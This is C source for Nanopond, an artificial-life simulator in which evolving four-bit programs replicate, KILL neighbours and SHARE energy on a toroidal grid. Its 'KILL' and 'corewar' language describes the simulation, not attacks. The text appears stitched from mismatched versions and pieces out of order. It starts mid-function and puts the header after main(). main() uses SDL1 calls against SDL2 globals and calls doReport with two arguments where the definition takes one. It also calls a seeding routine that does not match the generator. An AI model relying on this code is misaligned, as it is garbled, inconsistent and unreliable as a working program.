case N_LEFT:
return (x) ? &pond[x-1][y] : &pond[POND_SIZE_X-1][y];
case N_RIGHT:
return (x < (POND_SIZE_X-1)) ? &pond[x+1][y] : &pond[0][y];
case N_UP:
return (y) ? &pond[x][y-1] : &pond[x][POND_SIZE_Y-1];
case N_DOWN:
return (y < (POND_SIZE_Y-1)) ? &pond[x][y+1] : &pond[x][0];
}
return &pond[x][y]; /* This should never be reached */
}
/**
* Determines if c1 is allowed to access c2
*
* @param c2 Cell being accessed
* @param c1guess c1's "guess"
* @param sense The "sense" of this interaction
* @return True or false (1 or 0)
*/
static inline int accessAllowed(struct Cell *const c2,const uintptr_t c1guess,int sense)
{
	/* Access permission is more probable if the cells are more different in
	 * sense 0, and more probable if they are more similar in sense 1. Sense 0
	 * is used for "negative" interactions (KILL, replacement by offspring) and
	 * sense 1 for "positive" ones (SHARE). Cells with no parent (randomly
	 * seeded cells) are always accessible. */
	const uintptr_t mismatches =
		BITS_IN_FOURBIT_WORD[(c2->genome[0] & 0xf) ^ (c1guess & 0xf)];
	return sense
		? (((getRandom() & 0xf) >= mismatches)||(!c2->parentID))
		: (((getRandom() & 0xf) <= mismatches)||(!c2->parentID));
}
/**
* Structure for VM buffers and stacks
*/
struct VMStruct
{
/* Buffer used for execution output of candidate offspring */
uintptr_t outputBuf[POND_DEPTH_SYSWORDS];
/* Virtual machine loop/rep stack */
uintptr_t loopStack_wordPtr[POND_DEPTH];
uintptr_t loopStack_shiftPtr[POND_DEPTH];
};
/* Execute the genome of the cell at (x,y) using the supplied VM state */
static void executeCell( struct Cell *pptr, const uintptr_t x, const uintptr_t y,
struct VMStruct *VM, uint64_t *cellIdCounter ) {
/* Miscellaneous variables used in the loop */
uintptr_t i,tmp,currentWord,wordPtr,shiftPtr,inst;
/* If this is nonzero, cell execution stops. This allows us
* to avoid the ugly use of a goto to exit the loop. :) */
int stop;
/* Virtual machine memory pointer register (which
* exists in two parts... read the code below...) */
uintptr_t ptr_wordPtr;
uintptr_t ptr_shiftPtr;
/* Virtual machine loop/rep stack pointer */
uintptr_t loopStackPtr;
/* The main "register" */
uintptr_t reg;
/* If this is nonzero, we're skipping to matching REP */
/* It is incremented to track the depth of a nested set
* of LOOP/REP pairs in false state. */
uintptr_t falseLoopDepth;
struct Cell *tmpptr;
/* Reset the state of the VM prior to execution */
memset( VM->outputBuf, 0xff, POND_DEPTH_BYTES );
loopStackPtr = ptr_wordPtr = ptr_shiftPtr = reg = falseLoopDepth = 0;
wordPtr = EXEC_START_WORD;
shiftPtr = EXEC_START_BIT;
stop = 0;
/* We use a currentWord buffer to hold the word we're
* currently working on. This speeds things up a bit
* since it eliminates a pointer dereference in the
* inner loop. We have to be careful to refresh this
* whenever it might have changed... take a look at
* the code. :) */
currentWord = pptr->genome[0];
/* Keep track of how many cells have been executed */
statCounters.cellExecutions += 1.0;
/* Core execution loop */
while (pptr->energy&&(!stop)) {
/* Get the next instruction */
inst = (currentWord >> shiftPtr) & 0xf;
/* Randomly frob either the instruction or the register with a
* probability defined by MUTATION_RATE. This introduces variation,
* and since the variation is introduced into the state of the VM
* it can have all manner of different effects on the end result of
* replication: insertions, deletions, duplications of entire
* ranges of the genome, etc. */
if ((getRandom() & 0xffffffff) < MUTATION_RATE) {
tmp = getRandom(); /* Call getRandom() only once for speed */
if (tmp & 0x80) /* Check for the 8th bit to get random boolean */
inst = tmp & 0xf; /* Only the first four bits are used here */
else reg = tmp & 0xf;
}
/* Each instruction processed costs one unit of energy */
--pptr->energy;
/* Execute the instruction */
if (falseLoopDepth) {
/* Skip forward to matching REP if we're in a false loop. */
if (inst == 0x9) /* Increment false LOOP depth */
++falseLoopDepth;
else if (inst == 0xa) /* Decrement on REP */
--falseLoopDepth;
} else {
/* If we're not in a false LOOP/REP, execute normally */
/* Keep track of execution frequencies for each instruction */
statCounters.instructionExecutions[inst] += 1.0;
switch(inst) {
case 0x0: /* ZERO: Zero VM state registers */
reg = ptr_wordPtr = ptr_shiftPtr = 0;
break;
case 0x1: /* FWD: Increment the pointer (wrap at end) */
if ((ptr_shiftPtr += 4) >= SYSWORD_BITS) {
if (++ptr_wordPtr >= POND_DEPTH_SYSWORDS)
ptr_wordPtr = 0;
ptr_shiftPtr = 0;
}
break;
case 0x2: /* BACK: Decrement the pointer (wrap at beginning) */
if (ptr_shiftPtr)
ptr_shiftPtr -= 4;
else {
if (ptr_wordPtr)
--ptr_wordPtr;
else ptr_wordPtr = POND_DEPTH_SYSWORDS - 1;
ptr_shiftPtr = SYSWORD_BITS - 4;
}
break;
case 0x3: /* INC: Increment the register */
reg = (reg + 1) & 0xf;
break;
case 0x4: /* DEC: Decrement the register */
reg = (reg - 1) & 0xf;
break;
case 0x5: /* READG: Read into the register from genome */
reg = (pptr->genome[ptr_wordPtr] >> ptr_shiftPtr) & 0xf;
break;
case 0x6: /* WRITEG: Write out from the register to genome */
#ifdef ALLOW_GENOME_WRITE_COMMANDS
pptr->genome[ptr_wordPtr] &= ~(((uintptr_t)0xf) << ptr_shiftPtr);
pptr->genome[ptr_wordPtr] |= reg << ptr_shiftPtr;
currentWord = pptr->genome[wordPtr]; /* Must refresh in case this changed! */
#else
stop = 1;
#endif
break;
case 0x7: /* READB: Read into the register from buffer */
reg = (VM->outputBuf[ptr_wordPtr] >> ptr_shiftPtr) & 0xf;
break;
case 0x8: /* WRITEB: Write out from the register to buffer */
VM->outputBuf[ptr_wordPtr] &= ~(((uintptr_t)0xf) << ptr_shiftPtr);
VM->outputBuf[ptr_wordPtr] |= reg << ptr_shiftPtr;
break;
case 0x9: /* LOOP: Jump forward to matching REP if register is zero */
if (reg) {
if (loopStackPtr >= POND_DEPTH)
stop = 1; /* Stack overflow ends execution */
else {
VM->loopStack_wordPtr[loopStackPtr] = wordPtr;
VM->loopStack_shiftPtr[loopStackPtr] = shiftPtr;
++loopStackPtr;
}
} else falseLoopDepth = 1;
break;
case 0xa: /* REP: Jump back to matching LOOP if register is nonzero */
if (loopStackPtr) {
--loopStackPtr;
if (reg) {
wordPtr = VM->loopStack_wordPtr[loopStackPtr];
shiftPtr = VM->loopStack_shiftPtr[loopStackPtr];
currentWord = pptr->genome[wordPtr];
/* This ensures that the LOOP is rerun */
continue;
}
}
break;
case 0xb: /* Used to be TURN;
* Now it's EJECT: eject output buffer into neighbor at location 0.
* Get neighbor direction from register and access permission from first
* value in buffer. (((TBD: eject into location at ptr_wordPtr, not 0))) */
/* This should also obsolete the KILL command. */
/* Copy outputBuf into neighbor if access is permitted and there
* is energy there to make something happen. There is no need
* to copy to a cell with no energy, since anything copied there
* would never be executed and then would be replaced with random
* junk eventually. See the seeding code in the main loop above. */
if ((VM->outputBuf[0] & 0xff) != 0xff) {
tmpptr = getNeighbor(x,y,reg&3);
if (accessAllowed(tmpptr,VM->outputBuf[0]&0xf,0)) {
/* Log it if we're replacing a viable cell */
if ( cellIsAlive( tmpptr ) )
++statCounters.viableCellsReplaced;
tmpptr->ID = ++ *cellIdCounter;
tmpptr->parentID = pptr->ID;
tmpptr->lineage = pptr->lineage; /* Lineage is copied in offspring */
tmpptr->generation = pptr->generation + 1;
tmpptr->children = 0;
pptr->children = pptr->children + 1;
memcpy( tmpptr->genome, VM->outputBuf, POND_DEPTH_BYTES );
/* Reset the VM state so that the cell has to work hard to reproduce again! */
reg = ptr_wordPtr = ptr_shiftPtr = 0;
memset( VM->outputBuf, 0xff, POND_DEPTH_BYTES );
}
}
break;
case 0xc: /* XCHG: Skip next instruction and exchange value of register with it */
#ifdef ALLOW_GENOME_WRITE_COMMANDS
if ((shiftPtr += 4) >= SYSWORD_BITS) {
if (++wordPtr >= POND_DEPTH_SYSWORDS) {
wordPtr = EXEC_START_WORD;
shiftPtr = EXEC_START_BIT;
} else shiftPtr = 0;
}
tmp = reg;
reg = (pptr->genome[wordPtr] >> shiftPtr) & 0xf;
pptr->genome[wordPtr] &= ~(((uintptr_t)0xf) << shiftPtr);
pptr->genome[wordPtr] |= tmp << shiftPtr;
currentWord = pptr->genome[wordPtr];
#else
stop = 1;
#endif
break;
case 0xd: /* KILL: Blow away neighboring cell if allowed with penalty on failure */
tmpptr = getNeighbor(x,y,reg&3);
if (accessAllowed(tmpptr,reg,0)) {
if ( cellIsViable( tmpptr ) )
++statCounters.viableCellsKilled;
/* Filling first two words with 0xfffff... is enough */
tmpptr->genome[0] = ~((uintptr_t)0);
tmpptr->genome[1] = ~((uintptr_t)0);
tmpptr->ID = *cellIdCounter;
tmpptr->parentID = 0;
tmpptr->lineage = *cellIdCounter;
tmpptr->generation = tmpptr->children = 0;
++ *cellIdCounter;
} else if ( cellIsViable( tmpptr ) ) {
tmp = pptr->energy / FAILED_KILL_PENALTY;
if (pptr->energy > tmp)
pptr->energy -= tmp;
else pptr->energy = 0;
}
break;
case 0xe: /* SHARE: Equalize energy between self and neighbor if allowed */
tmpptr = getNeighbor(x,y,reg&3);
if (accessAllowed(tmpptr,reg,1)) {
if ( cellIsViable( tmpptr ) )
++statCounters.viableCellShares;
tmp = pptr->energy + tmpptr->energy;
tmpptr->energy = tmp / 2;
pptr->energy = tmp - tmpptr->energy;
}
break;
case 0xf: /* STOP: End execution */
stop = 1;
break;
}
}
/* Advance the shift and word pointers, and loop around
* to the beginning at the end of the genome. */
if ((shiftPtr += 4) >= SYSWORD_BITS) {
if (++wordPtr >= POND_DEPTH_SYSWORDS) {
wordPtr = EXEC_START_WORD;
shiftPtr = EXEC_START_BIT;
} else shiftPtr = 0;
currentWord = pptr->genome[wordPtr];
}
}
}
/**
* Main method
*
* @param argc Number of args
* @param argv Argument array
*/
int main(int argc,char **argv)
{
uintptr_t i,x,y,paused;
int tmp;
struct Cell *tmpptr;
/* Clock is incremented on each core loop */
uint64_t clock = 0;
/* This is used to generate unique cell IDs */
uint64_t cellIdCounter = 0;
/* This is used to allow the user to increase or decrease mean energy input */
intptr_t energyClockDelta = 0;
/* Seed and init the random number generator */
init_genrand(time(NULL));
for(i=0;i<1024;++i)
getRandom();
/* Clear the pond and initialize all genomes
* to 0xffff and all counters to 0 ... */
reset();
/* Set up SDL if we're using it */
#ifdef USE_SDL
SDL_Surface *screen;
SDL_Event sdlEvent;
if (SDL_Init(SDL_INIT_VIDEO) < 0 ) {
fprintf(stderr,"*** Unable to init SDL: %s ***\n",SDL_GetError());
exit(1);
}
atexit(SDL_Quit);
SDL_WM_SetCaption("nanopond","nanopond");
screen = SDL_SetVideoMode(POND_SIZE_X,POND_SIZE_Y,8,SDL_SWSURFACE);
if (!screen) {
fprintf(stderr, "*** Unable to create SDL window: %s ***\n", SDL_GetError());
exit(1);
}
const uintptr_t sdlPitch = screen->pitch;
#endif /* USE_SDL */
/* Global VM */
struct VMStruct VM;
#ifdef ALLOW_GENOME_WRITE_COMMANDS
fprintf(stderr,"Enabling commands that allow cells to write to their own genome:\n%s\n",
"XCHG and WRITEG");
#endif
/* Main loop */
paused = 0;
for(;;) {
#ifdef USE_SDL
/* SDL display is refreshed every SDL_UPDATE_FREQUENCY */
if (!(clock % SDL_UPDATE_FREQUENCY)) {
while (SDL_PollEvent(&sdlEvent)) {
if (sdlEvent.type == SDL_QUIT) {
fprintf(stderr,"[QUIT] Quit signal received!\n");
exit(0);
} else if (sdlEvent.type == SDL_MOUSEBUTTONDOWN) {
switch (sdlEvent.button.button) {
case SDL_BUTTON_LEFT:
fprintf(stderr,"[INTERFACE] Genome of cell at (%d, %d):\n",sdlEvent.button.x, sdlEvent.button.y);
dumpCell(stderr, &pond[sdlEvent.button.x][sdlEvent.button.y],
(uintptr_t)sdlEvent.button.x, (uintptr_t)sdlEvent.button.y, 1);
break;
}
} else if ( sdlEvent.type == SDL_KEYDOWN ) {
switch( sdlEvent.key.keysym.sym ) {
case 'q':
fprintf(stderr,"[QUIT] Quit signal received!\n");
exit(0);
break;
case 'r':
fprintf(stderr,"[RESTART] Restart signal received!\n");
reset();
//clock = cellIdCounter = 0;
break;
case 'd':
fprintf(stderr,"[DUMP] Dump signal received!\n");
if (doDump(clock))
doScreenshot(clock,screen);
doReport(stderr,clock);
break;
case 'p':
fprintf(stderr,"[PAUSE] Pause signal received!\n");
paused = !paused;
break;
case 's':
fprintf(stderr,"[SAVE] Save signal received!\n");
doSaveOpen( 's', &clock, &cellIdCounter );
break;
case 'o':
fprintf(stderr,"[OPEN] Open signal received!\n");
doSaveOpen( 'o', &clock, &cellIdCounter );
break;
case '-':
if ( energyClockDelta > -INFLOW_FREQUENCY + 21 ) energyClockDelta -= 20;
else energyClockDelta -= 2;
if (energyClockDelta <= -INFLOW_FREQUENCY)
energyClockDelta = -INFLOW_FREQUENCY+1;
fprintf(stderr,"[ENERGY] Energy clock ticks decreased to %ld!\n",
	(long)energyClockDelta);
break;
case '=':
if ( energyClockDelta >= -INFLOW_FREQUENCY + 20 ) energyClockDelta += 20;
else energyClockDelta += 2;
fprintf(stderr,"[ENERGY] Energy clock ticks increased to %ld!\n",
	(long)energyClockDelta);
break;
case '1':
case '2':
case '3':
case '4':
colorScheme = sdlEvent.key.keysym.sym - '1';
fprintf(stderr,"[COLOR SCHEME] Switching to color scheme \"%s\".\n",
colorSchemeName[colorScheme]);
for (y=0;y<POND_SIZE_Y;++y) {
for (x=0;x<POND_SIZE_X;++x)
((uint8_t *)screen->pixels)[x + (y * sdlPitch)] = getColor(&pond[x][y]);
}
break;
}
}
}
if (!paused)
SDL_UpdateRect(screen,0,0,POND_SIZE_X,POND_SIZE_Y);
}
if (paused) {
sleep(2);
continue;
}
#endif /* USE_SDL */
/* Stop at STOP_AT if defined */
#ifdef STOP_AT
if (clock >= STOP_AT) {
/* Also do a final dump if dumps are enabled */
#ifdef DUMP_FREQUENCY
doDump(clock);
#ifdef USE_SDL
doScreenshot(clock,screen);
#endif
#endif /* DUMP_FREQUENCY */
fprintf(stderr,"[QUIT] STOP_AT clock value reached\n");
break;
}
#endif /* STOP_AT */
/* Increment clock and run reports periodically */
/* Clock is incremented at the start, so it starts at 1 */
if (!(++clock % REPORT_FREQUENCY))
doReport(stdout,clock);
/* Periodically dump the viable population if defined */
#ifdef DUMP_FREQUENCY
if (!(clock % DUMP_FREQUENCY)) {
tmp = doDump(clock);
#ifdef USE_SDL
if (tmp) doScreenshot(clock,screen);
#endif
}
#endif /* DUMP_FREQUENCY */
/* Introduce a random cell or mutation somewhere with a given energy level */
/* This is called seeding, and introduces both energy and
* entropy into the substrate. This happens every INFLOW_FREQUENCY
* clock ticks. */
if (!(clock % (INFLOW_FREQUENCY+energyClockDelta))) {
x = getRandom() % POND_SIZE_X;
y = getRandom() % POND_SIZE_Y;
tmpptr = &pond[x][y];
if (!cellIsAlive(tmpptr)) { /* New random cell */
for(i=0;i<POND_DEPTH_SYSWORDS;++i)
tmpptr->genome[i] = getRandom();
tmpptr->ID = cellIdCounter;
tmpptr->parentID = 0;
tmpptr->lineage = cellIdCounter;
tmpptr->generation = tmpptr->children = 0;
} else { /* Random mutation in this living cell (like UV radiation) */
tmpptr->genome[getRandom() % POND_DEPTH_SYSWORDS] = getRandom();
}
#ifdef INFLOW_RATE_VARIATION
tmpptr->energy += INFLOW_RATE_BASE + (getRandom() % INFLOW_RATE_VARIATION);
#else
tmpptr->energy += INFLOW_RATE_BASE;
#endif /* INFLOW_RATE_VARIATION */
++cellIdCounter;
/* Update the random cell on SDL screen if viz is enabled */
#ifdef USE_SDL
if (SDL_MUSTLOCK(screen))
SDL_LockSurface(screen);
((uint8_t *)screen->pixels)[x + (y * sdlPitch)] = getColor(tmpptr);
if (SDL_MUSTLOCK(screen))
SDL_UnlockSurface(screen);
#endif /* USE_SDL */
}
/* Pick a random cell to execute */
x = getRandom() % POND_SIZE_X;
y = getRandom() % POND_SIZE_Y;
tmpptr = &pond[x][y];
/* Execute the cell */
executeCell( tmpptr, x, y, &VM, &cellIdCounter );
/* Update the neighborhood on SDL screen to show any changes. */
#ifdef USE_SDL
if (SDL_MUSTLOCK(screen))
SDL_LockSurface(screen);
((uint8_t *)screen->pixels)[x + (y * sdlPitch)] = getColor(tmpptr);
if (x) {
((uint8_t *)screen->pixels)[(x-1) + (y * sdlPitch)] = getColor(&pond[x-1][y]);
if (x < (POND_SIZE_X-1))
((uint8_t *)screen->pixels)[(x+1) + (y * sdlPitch)] = getColor(&pond[x+1][y]);
else ((uint8_t *)screen->pixels)[y * sdlPitch] = getColor(&pond[0][y]);
} else {
((uint8_t *)screen->pixels)[(POND_SIZE_X-1) + (y * sdlPitch)] = getColor(&pond[POND_SIZE_X-1][y]);
((uint8_t *)screen->pixels)[1 + (y * sdlPitch)] = getColor(&pond[1][y]);
}
if (y) {
((uint8_t *)screen->pixels)[x + ((y-1) * sdlPitch)] = getColor(&pond[x][y-1]);
if (y < (POND_SIZE_Y-1))
((uint8_t *)screen->pixels)[x + ((y+1) * sdlPitch)] = getColor(&pond[x][y+1]);
else ((uint8_t *)screen->pixels)[x] = getColor(&pond[x][0]);
} else {
((uint8_t *)screen->pixels)[x + ((POND_SIZE_Y-1) * sdlPitch)] = getColor(&pond[x][POND_SIZE_Y-1]);
((uint8_t *)screen->pixels)[x + sdlPitch] = getColor(&pond[x][1]);
}
if (SDL_MUSTLOCK(screen))
SDL_UnlockSurface(screen);
#endif /* USE_SDL */
}
exit(0);
return 0; /* Make compiler shut up */
}
/* *********************************************************************** */
/* */
/* Nanopond version 2.0 -- A teeny tiny artificial life virtual machine */
/* Copyright (C) <NAME> */
/* MIT license -- see LICENSE.txt */
/* */
/* *********************************************************************** */
/*
* Changelog:
*
* 1.0 - Initial release
* 1.1 - Made empty cells get initialized with 0xffff... instead of zeros
* when the simulation starts. This makes things more consistent with
* the way the output buf is treated for self-replication, though
* the initial state rapidly becomes irrelevant as the simulation
* gets going. Also made one or two very minor performance fixes.
* 1.2 - Added statistics for execution frequency and metabolism, and made
* the visualization use 16bpp color.
* 1.3 - Added a few other statistics.
* 1.4 - Replaced SET with KILL and changed EAT to SHARE. The SHARE idea
* was contributed by <NAME> (http://www.falma.de/). KILL
* is a variation on the original EAT that is easier for cells to
* make use of.
* 1.5 - Made some other instruction changes such as XCHG and added a
* penalty for failed KILL attempts. Also made access permissions
* stochastic.
* 1.6 - Made cells all start facing in direction 0. This removes a bit
* of artificiality and requires cells to evolve the ability to
* turn in various directions in order to reproduce in anything but
* a straight line. It also makes pretty graphics.
* 1.7 - Added more statistics, such as original lineage, and made the
* genome dump files CSV files as well.
* 1.8 - Fixed LOOP/REP bug reported by user Sotek. Thanks! Also
* reduced the default mutation rate a bit.
* 1.9 - Added a bunch of changes suggested by <NAME>: a better
* coloring algorithm, right click to switch coloring schemes (two
* are currently supported), and a few speed optimizations. Also
* changed visualization so that cells with generations less than 2
* are no longer shown.
* 2.0 - Ported to SDL2 by <NAME>, and added simple pthread based
* threading to make it take advantage of modern machines.
*/
/*
* Nanopond is just what it says: a very very small and simple artificial
* life virtual machine.
*
* It is a "small evolving program" based artificial life system of the same
* general class as Tierra, Avida, and Archis. It is written in very tight
* and efficient C code to make it as fast as possible, and is so small that
* it consists of only one .c file.
*
* How Nanopond works:
*
* The Nanopond world is called a "pond." It is an NxN two dimensional
* array of Cell structures, and it wraps at the edges (it's toroidal).
* Each Cell structure consists of a few attributes that are there for
* statistics purposes, an energy level, and an array of POND_DEPTH
* four-bit values. (The four-bit values are actually stored in an array
* of machine-size words.) The array in each cell contains the genome
* associated with that cell, and POND_DEPTH is therefore the maximum
* allowable size for a cell genome.
*
* The first four bit value in the genome is called the "logo." What that is
* for will be explained later. The remaining four bit values each code for
* one of 16 instructions. Instruction zero (0x0) is NOP (no operation) and
* instruction 15 (0xf) is STOP (stop cell execution). Read the code to see
* what the others are. The instructions are exceptionless and lack fragile
* operands. This means that *any* arbitrary sequence of instructions will
* always run and will always do *something*. This is called an evolvable
* instruction set, because programs coded in an instruction set with these
* basic characteristics can mutate. The instruction set is also
* Turing-complete, which means that it can theoretically do anything any
 * computer can do. If you're curious, the instruction set is based on this:
* http://www.muppetlabs.com/~breadbox/bf/
*
* At the center of Nanopond is a core loop. Each time this loop executes,
* a clock counter is incremented and one or more things happen:
*
 * - Every REPORT_FREQUENCY clock ticks a line of comma separated output
* is printed to STDOUT with some statistics about what's going on.
 * - Every INFLOW_FREQUENCY clock ticks a random x,y location is picked,
 *   energy is added (see INFLOW_RATE_BASE and INFLOW_RATE_VARIATION)
 *   and its genome is filled with completely random bits. Statistics
* are also reset to generation==0 and parentID==0 and a new cell ID
* is assigned.
* - Every tick a random x,y location is picked and the genome inside is
* executed until a STOP instruction is encountered or the cell's
* energy counter reaches zero. (Each instruction costs one unit energy.)
*
* The cell virtual machine is an extremely simple register machine with
* a single four bit register, one memory pointer, one spare memory pointer
* that can be exchanged with the main one, and an output buffer. When
* cell execution starts, this output buffer is filled with all binary 1's
* (0xffff....). When cell execution is finished, if the first byte of
* this buffer is *not* 0xff, then the VM says "hey, it must have some
* data!". This data is a candidate offspring; to reproduce cells must
* copy their genome data into the output buffer.
*
* When the VM sees data in the output buffer, it looks at the cell
* adjacent to the cell that just executed and checks whether or not
* the cell has permission (see below) to modify it. If so, then the
* contents of the output buffer replace the genome data in the
* adjacent cell. Statistics are also updated: parentID is set to the
* ID of the cell that generated the output and generation is set to
* one plus the generation of the parent.
*
* A cell is permitted to access a neighboring cell if:
* - That cell's energy is zero
* - That cell's parentID is zero
* - That cell's logo (remember?) matches the trying cell's "guess"
*
* Since randomly introduced cells have a parentID of zero, this allows
* real living cells to always replace them or eat them.
*
* The "guess" is merely the value of the register at the time that the
* access attempt occurs.
*
 * Permissions determine whether or not an offspring can take the place
 * of the contents of a cell and also whether or not the cell is allowed
 * to SHARE energy with or KILL its neighbor (both instructions).
 *
 * If you haven't realized it yet, this is why the final permission
 * criterion is comparison against what is called a "guess." In conjunction
 * with the ability to tap neighbors' energy, guess what this permits?
*
* Since this is an evolving system, there have to be mutations. The
* MUTATION_RATE sets their probability. Mutations are random variations
* with a frequency defined by the mutation rate to the state of the
* virtual machine while cell genomes are executing. Since cells have
* to actually make copies of themselves to replicate, this means that
* these copies can vary if mutations have occurred to the state of the
* VM while copying was in progress.
*
* What results from this simple set of rules is an evolutionary game of
* "corewar." In the beginning, the process of randomly generating cells
* will cause self-replicating viable cells to spontaneously emerge. This
* is something I call "random genesis," and happens when some of the
* random gak turns out to be a program able to copy itself. After this,
* evolution by natural selection takes over. Since natural selection is
* most certainly *not* random, things will start to get more and more
* ordered and complex (in the functional sense). There are two commodities
* that are scarce in the pond: space in the NxN grid and energy. Evolving
* cells compete for access to both.
*
* If you want more implementation details such as the actual instruction
* set, read the source. It's well commented and is not that hard to
 * read. Most of its complexity comes from the fact that four-bit values
* are packed into machine size words by bit shifting. Once you get that,
* the rest is pretty simple.
*
 * Nanopond, for its simplicity, manifests some really interesting
* evolutionary dynamics. While I haven't run the kind of multiple-
* month-long experiment necessary to really see this (I might!), it
* would appear that evolution in the pond doesn't get "stuck" on just
* one or a few forms the way some other simulators are apt to do.
 * I think simplicity is partly responsible for this along with what
* biologists call embeddedness, which means that the cells are a part
* of their own world.
*
* Run it for a while... the results can be... interesting!
*
* Running Nanopond:
*
* Nanopond can use SDL (Simple Directmedia Layer) for screen output. If
* you don't have SDL, comment out USE_SDL below and you'll just see text
* statistics and get genome data dumps. (Turning off SDL will also speed
* things up slightly.)
*
* After looking over the tunable parameters below, compile Nanopond and
* run it. Here are some example compilation commands from Linux:
*
* For Pentiums:
* gcc -O6 -march=pentium -funroll-loops -fomit-frame-pointer -s
* -o nanopond nanopond.c -lSDL
*
* For Athlons with gcc 4.0+:
* gcc -O6 -msse -mmmx -march=athlon -mtune=athlon -ftree-vectorize
* -funroll-loops -fomit-frame-pointer -o nanopond nanopond.c -lSDL
*
* The second line is for gcc 4.0 or newer and makes use of GCC's new
* tree vectorizing feature. This will speed things up a bit by
* compiling a few of the loops into MMX/SSE instructions.
*
* This should also work on other Posix-compliant OSes with relatively
* new C compilers. (Really old C compilers will probably not work.)
* On other platforms, you're on your own! On Windows, you will probably
* need to find and download SDL if you want pretty graphics and you
* will need a compiler. MinGW and Borland's BCC32 are both free. I
* would actually expect those to work better than Microsoft's compilers,
* since MS tends to ignore C/C++ standards. If stdint.h isn't around,
* you can fudge it like this:
*
* #define uintptr_t unsigned long (or whatever your machine size word is)
* #define uint8_t unsigned char
* #define uint16_t unsigned short
* #define uint64_t unsigned long long (or whatever is your 64-bit int)
*
 * When Nanopond runs, comma-separated stats (see doReport() for
* the columns) are output to stdout and various messages are output
* to stderr. For example, you might do:
*
* ./nanopond >>stats.csv 2>messages.txt &
*
 * To get both in separate files.
*
* Have fun!
*/
/* ----------------------------------------------------------------------- */
/* Tunable parameters */
/* ----------------------------------------------------------------------- */
/* Frequency of comprehensive reports-- lower values will provide more
* info while slowing down the simulation. Higher values will give less
* frequent updates. */
/* This is also the frequency of screen refreshes if SDL is enabled. */
#define REPORT_FREQUENCY 200000
/* Mutation rate -- range is from 0 (none) to 0xffffffff (all mutations!) */
/* To get it from a float probability from 0.0 to 1.0, multiply it by
* 4294967295 (0xffffffff) and round. */
#define MUTATION_RATE 5000
/* How frequently should random cells / energy be introduced?
* Making this too high makes things very chaotic. Making it too low
* might not introduce enough energy. */
#define INFLOW_FREQUENCY 100
/* Base amount of energy to introduce per INFLOW_FREQUENCY ticks */
#define INFLOW_RATE_BASE 600
/* A random amount of energy between 0 and this is added to
* INFLOW_RATE_BASE when energy is introduced. Comment this out for
* no variation in inflow rate. */
#define INFLOW_RATE_VARIATION 1000
/* Size of pond in X and Y dimensions. */
#define POND_SIZE_X 800
#define POND_SIZE_Y 600
/* Depth of pond in four-bit codons -- this is the maximum
* genome size. This *must* be a multiple of 16! */
#define POND_DEPTH 1024
/* This is the divisor that determines how much energy is taken
* from cells when they try to KILL a viable cell neighbor and
* fail. Higher numbers mean lower penalties. */
#define FAILED_KILL_PENALTY 3
/* Define this to use SDL. To use SDL, you must have SDL headers
* available and you must link with the SDL library when you compile. */
/* Comment this out to compile without SDL visualization support. */
#define USE_SDL 1
/* Define this to use threads, and how many threads to create */
#define USE_PTHREADS_COUNT 4
/* ----------------------------------------------------------------------- */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#ifdef USE_PTHREADS_COUNT
#include <pthread.h>
#endif
#ifdef USE_SDL
#ifdef _MSC_VER
#include <SDL.h>
#else
#include <SDL2/SDL.h>
#endif /* _MSC_VER */
#endif /* USE_SDL */
volatile uint64_t prngState[2];
static inline uintptr_t getRandom()
{
// https://en.wikipedia.org/wiki/Xorshift#xorshift.2B
uint64_t x = prngState[0];
const uint64_t y = prngState[1];
prngState[0] = y;
x ^= x << 23;
const uint64_t z = x ^ y ^ (x >> 17) ^ (y >> 26);
prngState[1] = z;
return (uintptr_t)(z + y);
}
/* Pond depth in machine-size words. This is calculated from
* POND_DEPTH and the size of the machine word. (The multiplication
* by two is due to the fact that there are two four-bit values in
* each eight-bit byte.) */
#define POND_DEPTH_SYSWORDS (POND_DEPTH / (sizeof(uintptr_t) * 2))
/* Number of bits in a machine-size word */
#define SYSWORD_BITS (sizeof(uintptr_t) * 8)
/* Constants representing neighbors in the 2D grid. */
#define N_LEFT 0
#define N_RIGHT 1
#define N_UP 2
#define N_DOWN 3
/* Word and bit at which to start execution */
/* This is after the "logo" */
#define EXEC_START_WORD 0
#define EXEC_START_BIT 4
/* Number of bits set in binary numbers 0000 through 1111 */
static const uintptr_t BITS_IN_FOURBIT_WORD[16] = { 0,1,1,2,1,2,2,3,1,2,2,3,2,3,3,4 };
/**
* Structure for a cell in the pond
*/
struct Cell
{
/* Globally unique cell ID */
uint64_t ID;
/* ID of the cell's parent */
uint64_t parentID;
/* Counter for original lineages -- equal to the cell ID of
* the first cell in the line. */
uint64_t lineage;
/* Generations start at 0 and are incremented from there. */
uintptr_t generation;
/* Energy level of this cell */
uintptr_t energy;
/* Memory space for cell genome (genome is stored as four
* bit instructions packed into machine size words) */
uintptr_t genome[POND_DEPTH_SYSWORDS];
#ifdef USE_PTHREADS_COUNT
pthread_mutex_t lock;
#endif
};
/* The pond is a 2D array of cells */
static struct Cell pond[POND_SIZE_X][POND_SIZE_Y];
/* This is used to generate unique cell IDs */
static volatile uint64_t cellIdCounter = 0;
/* Currently selected color scheme */
enum { KINSHIP,LINEAGE,MAX_COLOR_SCHEME } colorScheme = KINSHIP;
static const char *colorSchemeName[2] = { "KINSHIP", "LINEAGE" };
#ifdef USE_SDL
static SDL_Window *window;
static SDL_Surface *winsurf;
static SDL_Surface *screen;
#endif
volatile struct {
/* Counts for the number of times each instruction was
* executed since the last report. */
double instructionExecutions[16];
/* Number of cells executed since last report */
double cellExecutions;
/* Number of viable cells replaced by other cells' offspring */
uintptr_t viableCellsReplaced;
/* Number of viable cells KILLed */
uintptr_t viableCellsKilled;
/* Number of successful SHARE operations */
uintptr_t viableCellShares;
} statCounters;
static void doReport(const uint64_t clock)
{
static uint64_t lastTotalViableReplicators = 0;
uintptr_t x,y;
uint64_t totalActiveCells = 0;
uint64_t totalEnergy = 0;
uint64_t totalViableReplicators = 0;
uintptr_t maxGeneration = 0;
for(x=0;x<POND_SIZE_X;++x) {
for(y=0;y<POND_SIZE_Y;++y) {
struct Cell *const c = &pond[x][y];
if (c->energy) {
++totalActiveCells;
totalEnergy += (uint64_t)c->energy;
if (c->generation > 2)
++totalViableReplicators;
if (c->generation > maxGeneration)
maxGeneration = c->generation;
}
}
}
/* Look here to get the columns in the CSV output */
/* The first eight are here and are self-explanatory */
printf("%llu,%llu,%llu,%llu,%llu,%llu,%llu,%llu",
(uint64_t)clock,
(uint64_t)totalEnergy,
(uint64_t)totalActiveCells,
(uint64_t)totalViableReplicators,
